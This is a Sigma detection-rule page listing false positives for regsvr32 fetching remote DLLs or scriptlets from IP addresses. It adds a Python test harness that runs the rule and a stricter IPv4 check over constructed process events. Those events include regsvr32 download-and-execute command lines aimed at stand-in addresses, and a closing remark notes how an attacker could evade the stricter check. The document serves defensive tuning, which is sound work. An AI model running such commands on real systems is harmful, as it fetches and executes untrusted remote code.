LoFP / FQDNs that start with a number such as "7-zip"

Techniques

Sample rules

Potentially Suspicious Regsvr32 HTTP IP Pattern

Description

Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address. The rule does not parse the URL; it only checks that the first character of the host after http:// or https:// is a digit 1-9, so any FQDN that begins with a number, such as "7-zip", satisfies it the same way a literal IP address does. That is the false positive recorded on this page.

Detection logic

condition: all of selection_*
selection_img:
  - Image|endswith: '\regsvr32.exe'
  - OriginalFileName: 'REGSVR32.EXE'
selection_ip:
  CommandLine|contains:
    - ' /i:http://1'
    - ' /i:http://2'
    - ' /i:http://3'
    - ' /i:http://4'
    - ' /i:http://5'
    - ' /i:http://6'
    - ' /i:http://7'
    - ' /i:http://8'
    - ' /i:http://9'
    - ' /i:https://1'
    - ' /i:https://2'
    - ' /i:https://3'
    - ' /i:https://4'
    - ' /i:https://5'
    - ' /i:https://6'
    - ' /i:https://7'
    - ' /i:https://8'
    - ' /i:https://9'
    - ' -i:http://1'
    - ' -i:http://2'
    - ' -i:http://3'
    - ' -i:http://4'
    - ' -i:http://5'
    - ' -i:http://6'
    - ' -i:http://7'
    - ' -i:http://8'
    - ' -i:http://9'
    - ' -i:https://1'
    - ' -i:https://2'
    - ' -i:https://3'
    - ' -i:https://4'
    - ' -i:https://5'
    - ' -i:https://6'
    - ' -i:https://7'
    - ' -i:https://8'
    - ' -i:https://9'
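The detection logic above run over a handful of process-creation events, as an added example that is not part of the LoFP page or the Sigma project. The two selections and the condition are transcribed into Python as the rule states them (list-of-maps is an OR, string matching is case-insensitive, as in Sigma). Alongside it sits a stricter IPv4-only check that is an assumption of this example, not the rule's own logic: it requires a dotted-quad host after the scheme, so a hostname that merely starts with a digit, such as 7-zip, no longer fires. All events, paths, addresses and domains are constructed (RFC 5737 addresses, reserved example domains).

```python
import re

# Added example, not part of the LoFP page or the Sigma project: the rule's
# selections transcribed into Python and run over constructed process-creation
# events, plus a stricter IPv4 check (an assumption of this example, not the
# rule's own logic) that does not fire on hostnames that merely start with a digit.

# The 36 substrings from selection_ip: ' /i:' or ' -i:', http or https, first host character 1-9.
SELECTION_IP = [
    f" {flag}:{scheme}://{digit}"
    for flag in ("/i", "-i")
    for scheme in ("http", "https")
    for digit in "123456789"
]

# Hardened check (assumption): only a dotted-quad host, optionally with a port, counts as an IP.
IPV4_URL = re.compile(
    r"\s[/-]i:https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?(?:[/\s]|$)", re.IGNORECASE
)


def selection_img(event):
    """selection_img: a list of maps in Sigma is an OR; Sigma string matching is case-insensitive."""
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "").upper()
    return image.endswith("\\regsvr32.exe") or original == "REGSVR32.EXE"


def selection_ip(event):
    """selection_ip: CommandLine|contains any of the 36 substrings (case-insensitive)."""
    cmd = event.get("CommandLine", "").lower()
    return any(s in cmd for s in SELECTION_IP)


def rule_matches(event):
    """condition: all of selection_*"""
    return selection_img(event) and selection_ip(event)


def refined_matches(event):
    """Same image check, but the URL host must be a literal IPv4 address."""
    return selection_img(event) and IPV4_URL.search(event.get("CommandLine", "")) is not None


# Constructed sample events (RFC 5737 addresses and reserved example domains).
EVENTS = {
    "ip_host": {
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "OriginalFileName": "REGSVR32.EXE",
        "CommandLine": r"regsvr32.exe /s /n /u /i:http://192.0.2.10/payload.sct scrobj.dll",
    },
    "ip_host_with_port": {
        "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
        "OriginalFileName": "REGSVR32.EXE",
        "CommandLine": r"regsvr32.exe /s /i:https://198.51.100.5:8443/payload.sct scrobj.dll",
    },
    "seven_zip_fqdn": {  # the false positive this page is about
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "OriginalFileName": "REGSVR32.EXE",
        "CommandLine": r"regsvr32.exe /s /i:https://7-zip.example/installer.sct scrobj.dll",
    },
    "alpha_fqdn": {
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "OriginalFileName": "REGSVR32.EXE",
        "CommandLine": r"regsvr32.exe /s /i:http://cdn.example.com/installer.sct scrobj.dll",
    },
    "renamed_binary": {  # Image renamed, but OriginalFileName still identifies regsvr32
        "Image": r"C:\Users\Public\svc.exe",
        "OriginalFileName": "REGSVR32.EXE",
        "CommandLine": r"svc.exe /s -i:http://203.0.113.7/x.sct scrobj.dll",
    },
    "other_image": {
        "Image": r"C:\Windows\System32\rundll32.exe",
        "OriginalFileName": "RUNDLL32.EXE",
        "CommandLine": r"rundll32.exe /i:http://192.0.2.10/x.sct",
    },
}


def evaluate(events=EVENTS):
    """Return {name: (page_rule_fires, ipv4_only_check_fires)} for each event."""
    return {name: (rule_matches(ev), refined_matches(ev)) for name, ev in events.items()}


if __name__ == "__main__":
    for name, (rule, refined) in evaluate().items():
        print(f"{name:18s} page rule={rule!s:5s} ipv4-only={refined}")
```

The "seven_zip_fqdn" event is the case this page catalogues: the page rule fires because ' /i:https://7' is a substring of the command line, while the IPv4-only check stays quiet. Note that the stricter check is a trade-off, not a free fix: the renamed-binary and port-suffixed events still match it, but an attacker who uses a hostname or an IPv6 literal instead of a dotted quad would evade it, so treat it as a tuning option for noisy environments rather than a replacement for the rule.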